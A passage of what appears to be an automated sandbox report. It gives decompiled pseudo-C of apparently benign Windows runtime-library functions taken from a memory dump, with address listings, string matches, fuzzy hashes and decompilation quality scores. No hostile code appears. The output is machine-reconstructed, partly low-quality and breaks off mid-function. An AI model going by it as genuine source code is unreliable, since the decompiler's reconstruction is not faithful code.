                                                        0x048cfb0f
                                                        0x048cfb07
                                                        0x00000000
                                                        0x048cfaf8
                                                        0x048cfadd

                                                        Strings
                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0490BE0F
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                        • API String ID: 0-865735534
                                                        • Opcode ID: ee94af90d2b8dc73745daa05e58912db9639873217fe15ca9aebfe7e66a2b42a
                                                        • Instruction ID: f0be15d5f97bddf949f5fb1ec4896ae33cb3787a1146c349aaa356fa39cae418
                                                        • Opcode Fuzzy Hash: ee94af90d2b8dc73745daa05e58912db9639873217fe15ca9aebfe7e66a2b42a
                                                        • Instruction Fuzzy Hash: 2BA1C371B006168FFB25DFA8C45476AB3A6AB44714F048A7DEB46DB6C0EB74F801CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04892D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 63%
                                                        			E04892D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4985350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4987bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E048D97C0();
				}
				if( *0x49879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x49879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E048C1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E048B7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0492FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E048D9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E048CE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L048EDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4986901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4986901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E048D9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E048D95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E048B7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E048B7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04917016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0492FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4985350;
							if(_t109 != 0x4985350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0492FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04925720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                        0x04892d8a
                                                        0x04892d8a
                                                        0x04892d92
                                                        0x04892d96
                                                        0x04892d9e
                                                        0x04892da0
                                                        0x04892da3
                                                        0x04892da5
                                                        0x04892da8
                                                        0x04892dab
                                                        0x04892db2
                                                        0x048ef9aa
                                                        0x048ef9ab
                                                        0x048ef9ae
                                                        0x048ef9ae
                                                        0x04892db8
                                                        0x04892dc2
                                                        0x048ef9b9
                                                        0x048ef9be
                                                        0x048ef9bf
                                                        0x048ef9bf
                                                        0x04892dcf
                                                        0x048ef9c9
                                                        0x04892dd5
                                                        0x04892dd5
                                                        0x04892dd5
                                                        0x04892dde
                                                        0x04892de1
                                                        0x04892e70
                                                        0x04892e72
                                                        0x04892e72
                                                        0x04892de7
                                                        0x04892deb
                                                        0x04892e7c
                                                        0x04892e83
                                                        0x04892e85
                                                        0x04892e8b
                                                        0x04892e8d
                                                        0x04892e92
                                                        0x04892e92
                                                        0x04892e85
                                                        0x04892df1
                                                        0x04892df7
                                                        0x04892df9
                                                        0x04892df9
                                                        0x04892dfc
                                                        0x04892dff
                                                        0x04892e02
                                                        0x00000000
                                                        0x04892e05
                                                        0x04892e0c
                                                        0x048ef9d9
                                                        0x04892e12
                                                        0x04892e12
                                                        0x04892e12
                                                        0x04892e1a
                                                        0x048ef9e3
                                                        0x048ef9e9
                                                        0x048ef9f0
                                                        0x048ef9f6
                                                        0x048ef9f8
                                                        0x048ef9f8
                                                        0x048ef9f0
                                                        0x04892e23
                                                        0x048efa02
                                                        0x048efa03
                                                        0x048efa05
                                                        0x048efa06
                                                        0x00000000
                                                        0x04892e29
                                                        0x04892e29
                                                        0x04892e2e
                                                        0x04892e34
                                                        0x04892e3e
                                                        0x00000000
                                                        0x00000000
                                                        0x04892e44
                                                        0x04892e47
                                                        0x04892e4d
                                                        0x00000000
                                                        0x00000000
                                                        0x04892e4f
                                                        0x04892e54
                                                        0x00000000
                                                        0x00000000
                                                        0x04892e5a
                                                        0x04892e5f
                                                        0x04892e9a
                                                        0x04892ea4
                                                        0x04892ea5
                                                        0x04892ea8
                                                        0x04892eaf
                                                        0x04892eb2
                                                        0x04892eb5
                                                        0x048efae9
                                                        0x048efaeb
                                                        0x048efaed
                                                        0x048efaef
                                                        0x048efaf7
                                                        0x048efaf8
                                                        0x048efafd
                                                        0x048efaff
                                                        0x048efb04
                                                        0x048efb04
                                                        0x048efaff
                                                        0x04892ec0
                                                        0x04892ec4
                                                        0x04892ec6
                                                        0x04892ec8
                                                        0x048efb14
                                                        0x048efb18
                                                        0x048efb1e
                                                        0x048efb21
                                                        0x048efb21
                                                        0x04892ece
                                                        0x04892ece
                                                        0x04892ece
                                                        0x04892ed7
                                                        0x04892e61
                                                        0x04892e63
                                                        0x048efa6b
                                                        0x048efa71
                                                        0x048efa76
                                                        0x048efa78
                                                        0x048efa8a
                                                        0x048efa7a
                                                        0x048efa83
                                                        0x048efa83
                                                        0x048efa8f
                                                        0x048efa91
                                                        0x048efa97
                                                        0x048efa9d
                                                        0x048efaa4
                                                        0x048efaaa
                                                        0x048efaaf
                                                        0x048efab1
                                                        0x048efac3
                                                        0x048efab3
                                                        0x048efabc
                                                        0x048efabc
                                                        0x048efac8
                                                        0x048efacb
                                                        0x048efadf
                                                        0x048efadf
                                                        0x048efacb
                                                        0x048efaa4
                                                        0x048efa91
                                                        0x04892e6f
                                                        0x04892e6f
                                                        0x04892e5f
                                                        0x048efa13
                                                        0x048efa15
                                                        0x048efa17
                                                        0x048efa1f
                                                        0x048efa21
                                                        0x048efa22
                                                        0x048efa25
                                                        0x048efa28
                                                        0x048efa2f
                                                        0x048efa2f
                                                        0x048efa2a
                                                        0x048efa2a
                                                        0x048efa2a
                                                        0x048efa31
                                                        0x048efa34
                                                        0x048efa36
                                                        0x048efa3c
                                                        0x048efa3e
                                                        0x048efa41
                                                        0x048efa43
                                                        0x048efa45
                                                        0x048efa45
                                                        0x048efa41
                                                        0x048efa3c
                                                        0x048efa4a
                                                        0x048efa4f
                                                        0x048efa51
                                                        0x048efa53
                                                        0x048efa56
                                                        0x048efa5b
                                                        0x048efa5e
                                                        0x00000000
                                                        0x048efa5e
                                                        0x04892e23

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Re-Waiting
                                                        • API String ID: 0-316354757
                                                        • Opcode ID: 6eb7aa6e7a0a17a8a75384ff8aa2514042be4e7a336679023ca435b9ffe00b2e
                                                        • Instruction ID: d9c2ddad3fee204d8dbd47c174f7988f0bd3d750281e0e82d3f5e6d681c8fbdf
                                                        • Opcode Fuzzy Hash: 6eb7aa6e7a0a17a8a75384ff8aa2514042be4e7a336679023ca435b9ffe00b2e
                                                        • Instruction Fuzzy Hash: BB610270A00A49BFEB21DF68C880B7E77E5AB81318F180FA9E651DB2C1D774BD409781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C2AE4, Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048C2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4988204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4988208; // 0x4988207
				_t8 = _t57 + 0x4988208; // 0x4988207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4988450; // 0x263e6c
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x498821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4986d5c; // 0x7f000654
							_t72 =  *0x4986d5c; // 0x7f000654
							_t75 =  *0x4986d5c; // 0x7f000654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4986d5c; // 0x7f000654
							_t84 =  *0x4986d5c; // 0x7f000654
							_t87 =  *0x4986d5c; // 0x7f000654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E048DF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                        0x048c2ae4
                                                        0x048c2aec
                                                        0x048c2aef
                                                        0x048c2af4
                                                        0x048c2af7
                                                        0x048c2afd
                                                        0x048c2b92
                                                        0x048c2b92
                                                        0x048c2b97
                                                        0x048c2b9c
                                                        0x048c2b9c
                                                        0x048c2b03
                                                        0x048c2b06
                                                        0x048c2b09
                                                        0x048c2b09
                                                        0x048c2b0f
                                                        0x048c2b15
                                                        0x048c2b15
                                                        0x048c2b1b
                                                        0x048c2b1e
                                                        0x048c2b21
                                                        0x048c2b26
                                                        0x048c2b29
                                                        0x048c2b81
                                                        0x048c2b84
                                                        0x048c2c0e
                                                        0x048c2c15
                                                        0x048c2c24
                                                        0x048c2c24
                                                        0x048c2b8a
                                                        0x048c2b8a
                                                        0x048c2b8a
                                                        0x048c2b8a
                                                        0x048c2b90
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2b4a
                                                        0x048c2b4a
                                                        0x048c2b4d
                                                        0x048c2b53
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2b55
                                                        0x048c2b58
                                                        0x048c2bb7
                                                        0x04905d1b
                                                        0x04905d37
                                                        0x04905d47
                                                        0x04905d53
                                                        0x048c2bbd
                                                        0x048c2bbd
                                                        0x048c2bbd
                                                        0x048c2bb7
                                                        0x048c2b5d
                                                        0x048c2c2f
                                                        0x04905d5b
                                                        0x04905d77
                                                        0x04905d87
                                                        0x04905d93
                                                        0x048c2c35
                                                        0x048c2c35
                                                        0x048c2c35
                                                        0x048c2c2f
                                                        0x048c2b65
                                                        0x048c2b9f
                                                        0x048c2ba2
                                                        0x048c2b67
                                                        0x048c2b67
                                                        0x048c2b69
                                                        0x048c2b6b
                                                        0x048c2b6e
                                                        0x048c2bc9
                                                        0x048c2bcc
                                                        0x048c2bcf
                                                        0x048c2bd4
                                                        0x048c2bd6
                                                        0x048c2bd6
                                                        0x048c2bdb
                                                        0x048c2c02
                                                        0x048c2c05
                                                        0x048c2c07
                                                        0x00000000
                                                        0x048c2c07
                                                        0x048c2be0
                                                        0x048c2c00
                                                        0x048c2c3f
                                                        0x048c2c3f
                                                        0x00000000
                                                        0x048c2c00
                                                        0x048c2be5
                                                        0x048c2be7
                                                        0x048c2bec
                                                        0x048c2bf4
                                                        0x048c2bf6
                                                        0x00000000
                                                        0x048c2bf6
                                                        0x048c2b70
                                                        0x048c2b76
                                                        0x048c2b2b
                                                        0x048c2b2b
                                                        0x048c2b2d
                                                        0x048c2b2f
                                                        0x048c2b32
                                                        0x048c2b35
                                                        0x048c2b3a
                                                        0x00000000
                                                        0x048c2b40
                                                        0x048c2b43
                                                        0x048c2b45
                                                        0x048c2b47
                                                        0x048c2b4a
                                                        0x048c2b4d
                                                        0x048c2b53
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2b53
                                                        0x048c2b78
                                                        0x048c2b78
                                                        0x048c2b7b
                                                        0x048c2b7e
                                                        0x00000000
                                                        0x048c2b7e
                                                        0x048c2b76
                                                        0x048c2ba5
                                                        0x048c2ba5
                                                        0x048c2ba8
                                                        0x048c2bad
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2baf
                                                        0x048c2baf
                                                        0x048c2bc2
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: l>&
                                                        • API String ID: 0-759461334
                                                        • Opcode ID: a6538f38eb8c1494d85dce0e07a7f772cbde5845b10fb76bdf2e4486bb0ae23e
                                                        • Instruction ID: 1ea911c4cd8cf697cf70e7b5beda420add07cf9a121716bb529bdca5ce0ad4d2
                                                        • Opcode Fuzzy Hash: a6538f38eb8c1494d85dce0e07a7f772cbde5845b10fb76bdf2e4486bb0ae23e
                                                        • Instruction Fuzzy Hash: 19515D7AF00115CBCB18DF1CC8909ADB7B1FB887047158AAEE856DB394E634FE519B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04960EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E04960EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0495FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04961074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E048D9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0495A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0495A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4988b04 >> 0x14) + (_v44 -  *0x4988b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E048B7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0495138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E048B7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0494FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4988724 & 0x00000008) != 0) {
						E049552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E049615B5(0x4988ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                        0x04960eb7
                                                        0x04960eb9
                                                        0x04960ec0
                                                        0x04960ec2
                                                        0x04960ecd
                                                        0x0496105b
                                                        0x0496105b
                                                        0x04961061
                                                        0x04961066
                                                        0x04961066
                                                        0x0496106b
                                                        0x04961073
                                                        0x04961073
                                                        0x04960ed3
                                                        0x04960ed6
                                                        0x04960edc
                                                        0x04960ee0
                                                        0x04960ee7
                                                        0x04960ef0
                                                        0x04960ef5
                                                        0x04960efa
                                                        0x04960efc
                                                        0x04960efd
                                                        0x04960f03
                                                        0x04960f04
                                                        0x04960f06
                                                        0x04960f07
                                                        0x04960f09
                                                        0x04960f0e
                                                        0x04960f14
                                                        0x04960f23
                                                        0x04960f2d
                                                        0x04960f34
                                                        0x04960f34
                                                        0x04960f14
                                                        0x04960f52
                                                        0x00000000
                                                        0x00000000
                                                        0x04960f58
                                                        0x04960f73
                                                        0x04960f74
                                                        0x04960f79
                                                        0x04960f7d
                                                        0x04960f80
                                                        0x04960f86
                                                        0x04960fab
                                                        0x04960fb5
                                                        0x04960fc6
                                                        0x04960fd1
                                                        0x04960fe3
                                                        0x04960fd3
                                                        0x04960fdc
                                                        0x04960fdc
                                                        0x04960feb
                                                        0x04961009
                                                        0x04961009
                                                        0x04961015
                                                        0x04961027
                                                        0x04961017
                                                        0x04961020
                                                        0x04961020
                                                        0x0496102f
                                                        0x0496103c
                                                        0x0496103c
                                                        0x04961048
                                                        0x04961050
                                                        0x04961050
                                                        0x04961055
                                                        0x00000000
                                                        0x04961055
                                                        0x04960f88
                                                        0x04960f9e
                                                        0x04960fa2
                                                        0x04960fa9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04960fa9
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `
                                                        • API String ID: 0-2679148245
                                                        • Opcode ID: e24694adca9165fad6640815bd04c986dbf0466e31afd66c7dea93318392f343
                                                        • Instruction ID: b82a8092f5cca652205e5ebd804f906437001e4c025689a1ab6c474dd58bcba4
                                                        • Opcode Fuzzy Hash: e24694adca9165fad6640815bd04c986dbf0466e31afd66c7dea93318392f343
                                                        • Instruction Fuzzy Hash: C85189712083829FE724DF28D985B2BB7E9EBC4714F144A3DF99697290D670F805CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E048CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E048B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E048D9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E048D9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E048D95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x261eb81a
							_t109 = L048B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000261e
								E048DF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000261e
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E048D95D0();
